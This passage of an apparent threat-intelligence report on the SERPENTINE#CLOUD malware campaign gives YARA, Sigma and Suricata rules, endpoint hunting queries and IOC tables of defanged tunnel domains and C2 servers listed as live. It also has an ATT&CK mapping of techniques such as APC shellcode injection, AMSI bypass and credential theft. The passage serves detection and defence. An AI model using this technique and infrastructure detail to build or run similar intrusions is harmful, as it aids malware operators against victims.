1MAR30_Hvvvvvvv-obf (Wave 6, March 30, VenomRAT/hvnc)
1MAR30_PHilli_Vio-obf (Wave 6, March 30, PhilliVio)

The obf suffix in Wave 6 indicates explicit acknowledgment of obfuscation in the naming, suggesting the Kramer framework was applied to the scripts after an initial unobfuscated build.

8.4 Temporal Work Pattern Analysis

Payload staging and modification timestamps across waves cluster in two activity windows:

Late night UTC (01:00–05:00 UTC): LNK creation, zmorf.py upload, PDF creation — consistent with CET evening hours (22:00–04:00 local)
Morning UTC (08:00–13:00 UTC): DLL compilation, batch upload, directory management — consistent with CET business hours (09:00–14:00 local)

This is consistent with a single operator or small team in the Central European timezone (UTC+1), working both evening and morning sessions.

8.5 Proofpoint / Securonix Attribution Confirmation

The following indicators directly match published SERPENTINE#CLOUD documentation:

Cloudflare Quick Tunnel + WsgiDAV as delivery infrastructure
Multi-RAT simultaneous deployment (Proofpoint specifically noted AsyncRAT + VenomRAT together)
Python portable runtime downloaded from python.org
Invoice-themed German phishing lures
Startup folder persistence via batch file
Double-extension lure files (.pdf.lnk, .pdf.wsh)
Multi-stage tunnel chaining (4 tunnels per wave)

The March 30 wave with explicit AsyncRAT + VenomRAT simultaneous deployment is the clearest confirmation of Proofpoint's documented signature for this actor.

Detection and Hunting

9.1 YARA Rules

rule SERPENTINE_CLOUD_zmorf_mubi_injector {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects zmorf.py/mubi.py polymorphic APC shellcode injector used in SERPENTINE#CLOUD"
        hash = "94f678838f8ec9ebe0a67e78b5912bd3c033b483df7f3dbf04ce9298b4c190f0"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav"
    strings:
        $s1 = "inject_shellcode" ascii
        $s2 = "QueueUserAPC" ascii
        $s3 = "VirtualAllocEx" ascii
        $s4 = "IsDebuggerPresent" ascii
        $s5 = "prefix = ''.join(random.choices" ascii
        $s6 = "eval(f\"{prefix}_xor\")" ascii
        $s7 = "zlib.decompress" ascii
        $s8 = "CREATE_SUSPENDED" ascii
    condition:
        4 of them
}

rule SERPENTINE_CLOUD_WSH_lure {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects WSH lure files used in SERPENTINE#CLOUD — WebDAV UNC path to trycloudflare.com"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav"
    strings:
        $s1 = "trycloudflare.com@SSL" ascii nocase
        $s2 = "DavWWWRoot" ascii
        $s3 = "ScriptFile" ascii
        $s4 = "UseEngine=JScript" ascii
    condition:
        ($s1 and $s2) or ($s3 and $s4 and $s1)
}

rule SERPENTINE_CLOUD_LNK_WebDAV_UNC {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects LNK files using WebDAV UNC paths to trycloudflare.com tunnels (SERPENTINE#CLOUD delivery)"
        tlp = "WHITE"
    strings:
        $trycloudflare = "trycloudflare.com" ascii wide
        $davwwwroot = "DavWWWRoot" ascii wide
        $regsvr32 = "regsvr32" ascii wide nocase
        $wscript = "wscript" ascii wide nocase
        $bitsadmin = "bitsadmin" ascii wide nocase
        $lnk_magic = { 4C 00 00 00 01 14 02 00 }
    condition:
        $lnk_magic at 0 and $trycloudflare and $davwwwroot and
        (1 of ($regsvr32, $wscript, $bitsadmin))
}

rule SERPENTINE_CLOUD_Batch_Dropper_Pattern {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects batch file droppers used in SERPENTINE#CLOUD — Python download + Contacts staging directory"
        tlp = "WHITE"
    strings:
        $python_dl = "python.org/ftp/python" ascii nocase
        $contacts1 = "Contacts\\MainRingtones" ascii nocase
        $contacts2 = "Contacts\\str" ascii nocase
        $contacts3 = "Contacts\\" ascii nocase
        $hidden = "attrib +h" ascii nocase
        $startup = "Start Menu\\Programs\\Startup" ascii nocase
        $embed = "embed-amd64.zip" ascii nocase
    condition:
        $python_dl and $startup and ($contacts1 or $contacts2 or ($contacts3 and $hidden))
}

rule SERPENTINE_CLOUD_XWorm_V64_Config {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects XWorm V6.4 config strings (celestialproject.org branding)"
        hash_xwb = "328e3f46caf5e63c9784e9bf05e066dab3c44eb84274b2496a1bb6b0bd09bad0"
        hash_wx  = "4df1eb2cefeffcf0d922d1e0304893cf13ed4cb03678f75be5f7275cb75e720d"
        tlp = "WHITE"
    strings:
        $ver1 = "XWorm V6.4 by celestialproject.org" ascii wide
        $ver2 = "celestialproject.org" ascii wide
        $mutex1 = "USB.exe" ascii wide
        $sep1 = "<XWormmm>" ascii wide
        $key1 = "<666666>" ascii wide
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

rule SERPENTINE_CLOUD_DcRat_Ebola_Cert {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-30"
        description = "Detects DcRat with EBOLA certificate issuer — linked to SERPENTINE#CLOUD Wave 1"
        hash = "b690b7b7c455c50170a29c812d2ebbae89a539bc63033445cb5c2d8255d13ffe"
        tlp = "WHITE"
    strings:
        $dcrat_sig = "DcRatByqwqdanchun" ascii wide
        $cert_issuer = "EBOLA" ascii wide
        $cert_org = "DcRat By qwqdanchun" ascii wide
        $amsi_str = "amsi.dll" ascii wide
        $mutex_hint = "DcRat" ascii wide
    condition:
        uint16(0) == 0x5A4D and $dcrat_sig and ($cert_issuer or $cert_org) and $amsi_str
}

9.2 Sigma Rules

title: SERPENTINE#CLOUD - regsvr32 DLL Load via WebDAV Cloudflare Tunnel
id: a9b2c1d4-e5f6-7890-abcd-ef1234567890
status: stable
description: Detects regsvr32.exe loading a DLL from a trycloudflare.com WebDAV UNC path
  — core technique in SERPENTINE#CLOUD Wave 5 (wet-envelope-beam-laser)
author: GHOST - Breakglass Intelligence
date: 2026/03/30
references:
  - https://intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav
tags:
  - attack.execution
  - attack.defense_evasion
  - attack.t1218.010
  - attack.t1071.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\regsvr32.exe'
    CommandLine|contains|all:
      - 'trycloudflare.com'
      - 'DavWWWRoot'
  condition: selection
falsepositives:
  - None expected in enterprise environments
level: critical
---
title: SERPENTINE#CLOUD - WSH/WSF File Execution from Temp Path (WebDAV Download)
id: b1c2d3e4-f5a6-7890-bcde-f12345678901
status: stable
description: Detects wscript.exe executing a .wsh or .wsf file from %TEMP% — matches
  the SERPENTINE#CLOUD bitsadmin-download-then-wscript pattern
author: GHOST - Breakglass Intelligence
date: 2026/03/30
tags:
  - attack.execution
  - attack.t1059.005
  - attack.t1197
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\cmd.exe'
    Image|endswith: '\wscript.exe'
    CommandLine|contains:
      - '\Temp\'
      - '\AppData\Local\Temp\'
    CommandLine|endswith:
      - '.wsh'
      - '.wsf'
  bitsadmin_parent:
    ParentCommandLine|contains: 'bitsadmin'
  condition: selection
falsepositives:
  - Legitimate scripts executed from Temp directory (rare in enterprise)
level: high
---
title: SERPENTINE#CLOUD - Python Embedded Runtime Download to Non-Standard Path
id: c2d3e4f5-a6b7-8901-cdef-123456789012
status: stable
description: Detects download of Python embedded distribution to LOCALAPPDATA or
  USERPROFILE subdirectory — used across all SERPENTINE#CLOUD Python delivery waves
author: GHOST - Breakglass Intelligence
date: 2026/03/30
tags:
  - attack.defense_evasion
  - attack.t1059.006
  - attack.t1027
logsource:
  category: process_creation
  product: windows
detection:
  selection_curl:
    Image|endswith:
      - '\curl.exe'
      - '\powershell.exe'
      - '\cmd.exe'
    CommandLine|contains|all:
      - 'python.org/ftp/python'
      - 'embed'
  selection_bitsadmin:
    Image|endswith: '\bitsadmin.exe'
    CommandLine|contains: 'python.org'
  condition: selection_curl or selection_bitsadmin
falsepositives:
  - Developer workstations downloading Python
level: medium
---
title: SERPENTINE#CLOUD - Batch File Created in Windows Startup Folder
id: d3e4f5a6-b7c8-9012-defa-234567890123
status: stable
description: Detects .bat file creation in Windows Startup folder — SERPENTINE#CLOUD
  persistence mechanism across all waves
author: GHOST - Breakglass Intelligence
date: 2026/03/30
tags:
  - attack.persistence
  - attack.t1547.001
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains: '\Start Menu\Programs\Startup\'
    TargetFilename|endswith: '.bat'
  condition: selection
falsepositives:
  - Legitimate software installers placing startup scripts (rare)
level: high
---
title: SERPENTINE#CLOUD - Suspicious File Created in Contacts Subdirectory
id: e4f5a6b7-c8d9-0123-efab-345678901234
status: experimental
description: Detects file creation in %USERPROFILE%\Contacts\ subdirectories — used
  in SERPENTINE#CLOUD as payload staging directory with attrib +h hiding
author: GHOST - Breakglass Intelligence
date: 2026/03/30
tags:
  - attack.defense_evasion
  - attack.t1564.001
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Contacts\MainRingtones\'
      - '\Contacts\str\'
      - '\Contacts\Str\'
  condition: selection
falsepositives:
  - None expected
level: high

9.3 Suricata / Network Detection Rules

# SERPENTINE#CLOUD Campaign Detection Rules
# Breakglass Intelligence — SID range 9001000–9001099
# Reference: https://intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav

# Detect WebDAV PROPFIND to trycloudflare.com (initial WebDAV mount)
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - SERPENTINE#CLOUD WebDAV PROPFIND to trycloudflare tunnel";
    flow:established,to_server;
    content:"PROPFIND"; http_method;
    content:"trycloudflare.com"; http_host;
    reference:url,intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav;
    classtype:trojan-activity;
    sid:9001000; rev:1;
)

# Detect Windows WebDAV MiniRedir client to trycloudflare.com
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - SERPENTINE#CLOUD Windows WebDAV Client connecting to trycloudflare";
    flow:established,to_server;
    content:"Microsoft-WebDAV-MiniRedir"; http_user_agent;
    content:"trycloudflare.com"; http_host;
    reference:url,intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav;
    classtype:trojan-activity;
    sid:9001001; rev:1;
)

# Detect DavClnt user agent to trycloudflare (alternative WebDAV client)
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - SERPENTINE#CLOUD DavClnt connecting to trycloudflare";
    flow:established,to_server;
    content:"DavClnt"; http_user_agent;
    content:"trycloudflare.com"; http_host;
    classtype:trojan-activity;
    sid:9001002; rev:1;
)

# Detect XWorm C2 callback to 91.219.238[.]140:7000
alert tcp $HOME_NET any -> 91.219.238[.]140 7000 (
    msg:"BGI - SERPENTINE#CLOUD XWorm C2 callback to ServerAstra Budapest";
    flow:established,to_server;
    reference:url,intel.breakglass.tech/post/serpentine-cloud-cloudflare-webdav;
    classtype:trojan-activity;
    sid:9001003; rev:1;
)

# Detect XWorm C2 callback to 178.16.55[.]160:2323 (Omegatech BPH)
alert tcp $HOME_NET any -> 178.16.55[.]160 2323 (
    msg:"BGI - SERPENTINE#CLOUD XWorm C2 callback to Omegatech BPH (Wave 1)";
    flow:established,to_server;
    classtype:trojan-activity;
    sid:9001004; rev:1;
)

# Detect DcRat C2 callback to 43.157.1[.]71:3232 (Tencent Frankfurt)
alert tcp $HOME_NET any -> 43.157.1[.]71 3232 (
    msg:"BGI - SERPENTINE#CLOUD DcRat C2 callback to Tencent Frankfurt";
    flow:established,to_server;
    classtype:trojan-activity;
    sid:9001005; rev:1;
)

# Detect XWorm C2 callback to 43.157.1[.]71:2323 (Tencent Frankfurt dual-host)
alert tcp $HOME_NET any -> 43.157.1[.]71 2323 (
    msg:"BGI - SERPENTINE#CLOUD XWorm C2 callback to Tencent Frankfurt (Wave 1)";
    flow:established,to_server;
    classtype:trojan-activity;
    sid:9001006; rev:1;
)

# Detect bitsadmin download from trycloudflare.com
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - SERPENTINE#CLOUD bitsadmin payload retrieval from trycloudflare";
    flow:established,to_server;
    content:"BITS_POST"; http_method;
    content:"trycloudflare.com"; http_host;
    classtype:trojan-activity;
    sid:9001007; rev:1;
)

# Detect WsgiDAV index page response (identifies open staging server)
alert http $EXTERNAL_NET any -> $HOME_NET any (
    msg:"BGI - SERPENTINE#CLOUD WsgiDAV staging server index page served";
    flow:established,to_client;
    content:"WsgiDAV"; http_server_body;
    content:"Index of"; http_server_body;
    classtype:trojan-activity;
    sid:9001008; rev:1;
)

# Detect Python embed distribution download from python.org (campaign-specific path)
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - SERPENTINE#CLOUD Python embedded runtime download";
    flow:established,to_server;
    content:"python.org"; http_host;
    content:"/ftp/python/"; http_uri;
    content:"embed-amd64.zip"; http_uri;
    classtype:policy-violation;
    sid:9001009; rev:1;
)

9.4 EDR / Endpoint Hunting Queries

Process creation — regsvr32 via WebDAV UNC:

process.name == "regsvr32.exe" AND
process.command_line CONTAINS "@SSL" AND
process.command_line CONTAINS "DavWWWRoot"

File creation — startup folder batch files from non-installer processes:

file.path CONTAINS "\\Start Menu\\Programs\\Startup\\" AND
file.extension IN ("bat", "lnk") AND
process.name NOT IN ("msiexec.exe", "setup.exe", "install.exe")

File creation — payload staging in Contacts directory:

file.path CONTAINS "\\Contacts\\" AND
file.extension IN ("zip", "py", "bat", "bin", "exe")

Process creation — Python executing from non-standard paths:

process.name == "python.exe" AND
process.path NOT CONTAINS "\\Python3" AND
process.path CONTAINS ("\\Contacts\\", "\\Winic\\", "\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\Cache")

Network connection — DuckDNS C2 callback:

dns.question.name ENDS_WITH ".duckdns.org" AND
NOT process.name IN ("chrome.exe", "firefox.exe", "msedge.exe")

Memory injection — Python QueueUserAPC into explorer.exe:

process.name == "explorer.exe" AND
injection.source_process.name == "python.exe" AND
injection.type IN ("QueueUserAPC", "CreateRemoteThread")

Full IOC Table

Cloudflare Tunnel Domains (all defanged)

Domain	Wave	Role	Status
`named-suites-walked-gratis.trycloudflare[.]com`	6	Lure WebDAV	LIVE
`dresses-but-checkout-quiz.trycloudflare[.]com`	6	WSF dropper	LIVE
`asset-military-cycle-appearance.trycloudflare[.]com`	6	BAT downloaders	LIVE
`investigator-leu-spray-declared.trycloudflare[.]com`	6	Python + RAT payloads	LIVE
`move-friendly-international-observed.trycloudflare[.]com`	4	Primary staging	DEAD
`refers-lonely-realized-legends.trycloudflare[.]com`	4	Lure delivery	DEAD
`presents-functional-works-steady.trycloudflare[.]com`	4	WSF hosting	DEAD
`post-yields-instrument-coupon.trycloudflare[.]com`	4	BAT hosting	DEAD
`age-das-centers-cargo.trycloudflare[.]com`	4/0	ZIP payloads	DEAD
`wet-envelope-beam-laser.trycloudflare[.]com`	5	DLL-loader + decoy	DEAD
`opposite-lodge-strict-closes.trycloudflare[.]com`	2	Lure + zmorf.py	DEAD
`fuji-layout-exterior-bunch.trycloudflare[.]com`	3	WSH lure	DEAD
`dialogue-pool-cookie-mini.trycloudflare[.]com`	3	WSF loader	DEAD
`stickers-gentleman-queen-dreams.trycloudflare[.]com`	3	BAT downloaders	DEAD
`empire-judge-delhi-finest.trycloudflare[.]com`	3	ZIP payloads	DEAD
`shortly-flux-corresponding-junction.trycloudflare[.]com`	1	Lure + dat.wsh	DEAD
`licensing-hypothesis-byte-thomas.trycloudflare[.]com`	1	Payload staging	DEAD
`statutes-scripts-friendship-switch.trycloudflare[.]com`	3/hist	Dead WSF target	DEAD
`ralph-choices-jury-generator.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`knife-jewellery-evaluate-defensive.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`lone-logs-visit-isolated.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`individually-bangkok-dedicated-static.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`servers-johnson-rebate-recipes.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`resolved-rss-carriers-found.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`attending-symphony-census-harbor.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`workflow-rest-wars-cargo.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`radius-spoke-investments-cst.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`advise-visual-playstation-closer.trycloudflare[.]com`	4	Campaign tunnel	DEAD
`intelligence-mighty-birthday-conceptual.trycloudflare[.]com`	4	Campaign tunnel	DEAD

C2 IP Addresses (defanged)

IP	Port	RAT	ASN	Status
`91.219.238[.]140`	7000	XWorm	AS56322 ServerAstra, Budapest HU	LIVE
`178.16.55[.]160`	2323	XWorm (xwb)	AS202412 Omegatech (BPH), Seychelles	LIVE
`43.157.1[.]71`	2323	XWorm (wx)	AS132203 Tencent Cloud, Frankfurt DE	LIVE
`43.157.1[.]71`	3232	DcRat	AS132203 Tencent Cloud, Frankfurt DE	LIVE
`12.202.180[.]133`	6745	AsyncRAT	AS7018 AT&T, Chicago IL US	LIVE (6745 confirmed open)
`12.202.180[.]133`	7878	DcRAT	AS7018 AT&T, Chicago IL US	LIVE
`12.202.180[.]133`	8292	XWorm V3.1	AS7018 AT&T, Chicago IL US	Filtered
`12.202.180[.]133`	6757	PureHVNC	AS7018 AT&T, Chicago IL US	LIVE
`12.202.180[.]105`	2120	Violet v5	AS7018 AT&T, Chicago IL US	LIVE

DuckDNS C2 Domains (defanged)

Domain	Port	RAT	Resolved IP
`hy647dhon.duckdns[.]org`	8292	XWorm V3.1	`12.202.180[.]133`
`uejrhnfq.duckdns[.]org`	6745	AsyncRAT	`12.202.180[.]133`
`y57kdsa.duckdns[.]org`	7878	DcRAT	`12.202.180[.]133`
`volvogroup20.duckdns[.]org`	2120	Violet v5	`12.202.180[.]105`

File Hashes — Wave 6 (March 30, 2026) (SHA256)

Hash	Filename	Size	Type
`58d37f54548fd4fc2844e5a447b8e444d8a6fdcff02df38e07fa902aac2f040f`	Re_0464546564392713.pdf.wsh	126B	WSH double-extension lure
`845b1c31206dd3b9c327f9977a1f014c9d0d3e7c7a673a7b26cd401705a53157`	Phmar30.wsf	666B	JScript stage-2 loader
`3aed9fa1d5655338c4e75629c1cbfe5a291e427f7658bd62981de95170ae93ca`	PhM301.bat	~2KB	Stage-3 downloader
`218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c`	PhM302.bat	3,002B	Stage-3 executor (UTF-16LE)
`6a5a5a6a95ac0710de6048113f3edf62aebce59a6213e0982a8e78f50e962c27`	PhM23MA.zip	~20MB	Python 3.12 + AsyncRAT + VenomRAT + PhilliVio RAT
`66ab1bcdd7968a7a6dcaff3cfcc964705699d9d880536e2167ab6b3dc210e18e`	PhM23ST.zip	~20MB	Python 3.12 + secondary RAT scripts

Note: PhM302.bat (SHA256 218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c) is identical to UKM032.txt from Wave 3 — confirming direct code reuse between the March 5 UK wave and the March 30 wave.

File Hashes — Wave 1 (March 4, 2026) — Key Samples

Hash	Filename	Family	Detection
`328e3f46caf5e63c9784e9bf05e066dab3c44eb84274b2496a1bb6b0bd09bad0`	xwb_pe (XWorm decrypted)	XWorm V6.4	51/76
`4df1eb2cefeffcf0d922d1e0304893cf13ed4cb03678f75be5f7275cb75e720d`	wx_pe (XWorm decrypted)	XWorm V6.4	51/76
`b690b7b7c455c50170a29c812d2ebbae89a539bc63033445cb5c2d8255d13ffe`	ap_pe (DcRat decrypted)	DcRat	40+/76
`6afbdd737bf86294c83d722f4470fe94fff8ed1c52b3739bcd3cffd3b97a3471`	rp_pe (PureCrypter)	PureCrypter	—
`a537078adf6734680d37af56b815aad682d684d77020d3aeb147f119546bb85a`	sw_pe (PureCrypter)	PureCrypter	—

File Hashes — Wave 2 (December 2025 – March 26, 2026)

Hash	Filename	Detection
`dec6c0a5a058300929a5d5ca6cf62808e02fe6232b44a2e082084d9b1bc6da1e`	Rechnung G143822563.lnk	21/76
`94f678838f8ec9ebe0a67e78b5912bd3c033b483df7f3dbf04ce9298b4c190f0`	zmorf.py (mubi.py)	3/76
`2cab35576d40a8dd509ec54d0a6654597f2566f1e2fb0fa1635573c391c60a1d`	bb.bat	0/76
`ac1d302605781bb5c92e7c05bc1fc1b8dcd8e50dd2993cd5f9a72fdb4fa33e40`	G143822563.pdf (decoy)	0/76

File Hashes — Wave 3 (March 5, 2026) — Key Samples

Hash	Filename	Family	Detection
`5decf89552e3949e15541cdbfa702c8c6f38445090785f07e27707a6dc97bdda`	Scan_0630274892048.pdf.wsh	WSH lure	—
`1039af45187af5b8460b8db86f4ebf67a6fd5c232c404eac061382bb7d4863f4`	ukmar03.wsf	JScript loader	—
`ab8a945511cf438b2cb6093671258f1216ae01800d4afad8befe98a65e66c22b`	UKM031.txt (downloader bat)	Dropper	—
`218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c`	UKM032.txt (executor bat)	Dropper	—
`268d9d9f3a7276af4c49884181658136c7a9c7ed9e990971d01bd2b21d92b7b3`	1Feb02MA.zip	Payload archive	—
`ed4fb8fe1d29aa1a604f0b910614688ad79816c98a9a46c07a2538edb85145dc`	XWorm V3.1	XWorm	51/76
`4bb4a303b8e4873401be1cea68d50bdaa454471685dc30ad61e9ef746181aa29`	AsyncRAT	AsyncRAT	—
`58d9f039ec38bbe03a1e1bf58a0102ce9c94d6efe39d2450cb44917d4a5c75af`	DcRAT/Infected-Anarchy	DcRAT	—
`4b6d47e03be3db8645c1de5c16d1ceba94acf2588ce9b4ede2d8e0d226981eba`	Violet v5	Violet	—
`f56a53ec6817c918d9a0056277022d694a06727bc9064bee95e4b80c50067f2a`	PureHVNC (Ygfumkl packer)	PureHVNC	—

File Hashes — Wave 4 (March 23–25, 2026)

Hash	Filename	Detection
`4018a25d8697cf8802de22990be3d500a525181bea7419918a2601b7dc85b5eb`	as.exe (XWorm)	51/76
`978a54a42629e0d19ef41bd5db7e560d618e1fdcc8e77c14694642840dfad8a2`	as.dll (loader)	2/76
`a78b29252a7954b588392b952b970da7ddb760cec7320ac4e8a50f79a8cf8f9b`	final.bat	8/76
`500ce5d0604f42137795bed1a03837e9fab1055c8db0b6ea5d7c6d64c5aa633a`	Telekom_3426503571.url.xxx	3/76

File Hashes — Wave 5 (March 25–26, 2026)

Hash	Filename	Detection
`bca1c8e9b804035f79082ad879dc1c52368b2a9d593bb3ef74605b3d9543c2df`	FSL_DE_INV_24032026_238969_EML.PDF.lnk	12/76
`f514c2057c2092fe3a573d0ebfd913b718a50c9dfbca9e9c619ace27909ca230`	FSL_DE_INV_24032026_238969_EML.url	1/76
`d465191a69dcf56d787036cac4eabc7dc313f3009f0fc30ec7a8aa23c5e0482f`	pnljjd.dll / wdigest.dll	10/76
`372748f3d615839bef7f9d85eeccac7bc9d508bd877cdfe03b0c9820d248072e`	ombmh.dat (encrypted payload)	N/A

Mutexes and Behavioral IOCs

Indicator	Type	RAT	Wave
`LApcAYSFOShHukHW`	Mutex	XWorm (Wave 4)	4
`USB.exe`	Mutex	XWorm V6.4	1
`lOyuApQB7sBGSt3o`	Mutex	XWorm V3.1	3
`AsyncMutex_6SI8OkPnk`	Mutex	AsyncRAT	3
`XSRSXSX`	Mutex	Violet v5	3
`<XWormmm>`	Protocol separator	XWorm V6.4	1
`<666666>`	XWorm encryption key	XWorm V6.4	1
`DcRatByqwqdanchun`	Attribution string	DcRat	1, 3
`%LOCALAPPDATA%\Microsoft\WinHTTP\wdigest.dll`	Persistence path	Loader DLL	5
`%USERPROFILE%\Contacts\MainRingtones\`	Staging path	Multi-RAT	3, 6
`%APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\`	Staging path	XWorm	4
`%LOCALAPPDATA%\xt\`	Python staging path	zmorf.py	2
`CryptoLoader.lnk`	Startup LNK name	XWorm	4
`startup.bat`	Startup BAT name	Multi	1, 2

Build Machine Identifiers (OPSEC Artifacts)

Hostname	Wave	Source	Significance
`vincent-pc`	1	LNK TrackerDataBlock	Payload builder machine
`desktop-bul6k1u`	2	LNK TrackerDataBlock	Builder AND XWorm C2 (RDP cert on 178.16.55[.]160)
`ec2amaz-vjnf8l9`	4	LNK TrackerDataBlock	AWS EC2 Windows AMI — cloud build environment
`DESKTOP-BVGFFOA`	4	RDP certificate CN on 91.219.238[.]140	C2 server operator hostname

MITRE ATT&CK Mapping

Tactic	Technique	ID	Waves	Details
Initial Access	Phishing: Spearphishing Link	T1566.002	1–6	Email with link to WebDAV share or .url attachment
Initial Access	Phishing: Spearphishing Attachment	T1566.001	2, 5	.lnk and .url file email attachments
Execution	User Execution: Malicious File	T1204.002	1–6	LNK, WSH, WSF, URL shortcut execution
Execution	Command Scripting: Windows Command Shell	T1059.003	1–6	BAT file execution chains
Execution	Command Scripting: VBScript	T1059.005	1, 2	WSH/WSF VBScript execution
Execution	Command Scripting: JScript	T1059.007	3, 4, 6	JScript-based WSF loaders
Execution	Command Scripting: Python	T1059.006	1–4, 6	Python portable runtime used for shellcode injection
Execution	System Services: Service Execution	T1569.002	5	regsvr32.exe DLL registration (LOLBin)
Execution	BITS Jobs	T1197	2	bitsadmin /transfer for initial payload download
Persistence	Startup Folder	T1547.001	1–6	Startup .bat / .lnk in Windows Startup folder
Persistence	Registry Run Keys	T1547.001	1, 3	DcRat registry persistence
Persistence	Scheduled Task	T1053.005	1, 3	DcRat schtasks /sc onlogon
Defense Evasion	Masquerading: Double Extension	T1036.007	1–6	.pdf.lnk, .pdf.wsh, .PDF.lnk
Defense Evasion	Masquerading: Legitimate Name	T1036.005	1–6	Edge icon on LNK, wdigest.dll naming
Defense Evasion	System Binary Proxy Execution: Regsvr32	T1218.010	5	regsvr32 /s loading DLL from WebDAV
Defense Evasion	System Binary Proxy Execution: Wscript	T1218.005	1–4, 6	wscript.exe WSH/WSF execution
Defense Evasion	Process Injection: APC	T1055.004	1–3, 6	QueueUserAPC (Early Bird) into explorer.exe
Defense Evasion	Process Injection: CreateRemoteThread	T1055.003	4	CreateRemoteThread into explorer.exe
Defense Evasion	Obfuscated Files: Encrypted Payload	T1027.013	1–6	Multi-layer encryption (XOR, AES, Donut/Chaskey)
Defense Evasion	Subvert Trust Controls: AMSI Bypass	T1562.001	1, 3	Donut AMSI patch + DcRat runtime AMSI patch
Defense Evasion	Hide Artifacts: Hidden Files	T1564.001	3, 6	attrib +h on payload directories
Defense Evasion	Debugger Evasion	T1622	2	IsDebuggerPresent check in zmorf.py
Defense Evasion	Indicator Removal: File Deletion	T1070.004	3, 6	BAT files delete themselves post-execution
Defense Evasion	Hide Infrastructure	T1665	1–6	Cloudflare tunnel hides origin server IP
Credential Access	Credentials from Browser	T1555.003	1, 3	XWorm Recovery, Violet v5 GetPass
Credential Access	Keylogging	T1056.001	1, 3	XWorm keylogger, Violet v5 keylogger
Collection	Clipboard Data	T1115	3	Violet v5 clipboard hijacker (crypto theft)
Collection	Screen Capture	T1113	1, 3	XWorm screenshot, DcRat webcam
Collection	Video Capture	T1125	1, 3	XWorm webcam (avicap32.dll)
C2	Application Layer Protocol: Web Protocols	T1071.001	1–6	WebDAV over HTTPS for staging
C2	Protocol Tunneling	T1572	1–6	Cloudflare tunnel for origin obfuscation
C2	Non-Standard Port	T1571	1, 3–5	XWorm on 7000/2323, DcRat on 3232, HVNC on 6757
C2	Dead Drop Resolver	T1102.001	1, 3	Pastebin backup C2 in AsyncRAT/DcRat config
Resource Development	Web Services: Cloudflare Tunnels	T1583.006	1–6	Free Quick Tunnel, no account required
Impact	Network Denial of Service	T1498	1, 3	XWorm DDoS (StartDDos/StopDDos), Violet v5 DDoS

Recommended Actions

Immediate (24–48 hours)

Block the four live Wave 6 tunnel domains at DNS/proxy:
- named-suites-walked-gratis.trycloudflare[.]com
- dresses-but-checkout-quiz.trycloudflare[.]com
- asset-military-cycle-appearance.trycloudflare[.]com
- investigator-leu-spray-declared.trycloudflare[.]com
Submit Cloudflare abuse report for all four live tunnels: registrar-abuse@cloudflare.com. Include this report as supporting documentation.
Block C2 IPs at perimeter firewall:
- 91.219.238[.]140 (all ports, especially 7000 and 3389)
- 178.16.55[.]160 (all ports, especially 2323 and 3389)
- 43.157.1[.]71 (ports 2323, 3232, 3389)
- 12.202.180[.]133 and 12.202.180[.]105 (AT&T Chicago — consider ASN-level blocking if AT&T IP range is not expected in your environment)
Hunt endpoints for:
- Files in %LOCALAPPDATA%\Microsoft\WinHTTP\wdigest.dll
- Directories %USERPROFILE%\Contacts\MainRingtones\ or %USERPROFILE%\Contacts\str\
- startup.bat or start.bat in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
- Python processes spawning from %USERPROFILE%\Contacts\ or %LOCALAPPDATA%\xt\
- Mutexes: LApcAYSFOShHukHW, USB.exe, XSRSXSX, AsyncMutex_6SI8OkPnk
Alert email gateways to quarantine:
- Files matching FSL_*_EML.PDF.lnk or FSL_*_EML.url
- .lnk or .wsh attachments
- Links containing trycloudflare.com in email bodies

Short-Term (1–2 weeks)

Disable Windows WebClient service on endpoints where WebDAV access is not required. This prevents the .url file vector entirely — without WebClient, the Windows WebDAV MiniRedir cannot mount the tunnel as a network share.
Deploy file hash blocklist for all SHA256 hashes in Section 10, particularly the confirmed RAT payloads (XWorm, AsyncRAT, DcRat, Violet v5) to EDR platforms.
Deploy Sigma rules (Section 9.2) to SIEM. The regsvr32 WebDAV UNC rule and startup folder batch creation rule have the highest signal-to-noise ratio.
Deploy Suricata rules (Section 9.3) at network perimeter. Prioritize SID 9001000–9001002 (WebDAV to trycloudflare) and SID 9001003–9001006 (known C2 callbacks).
Report C2 servers to their hosting providers:
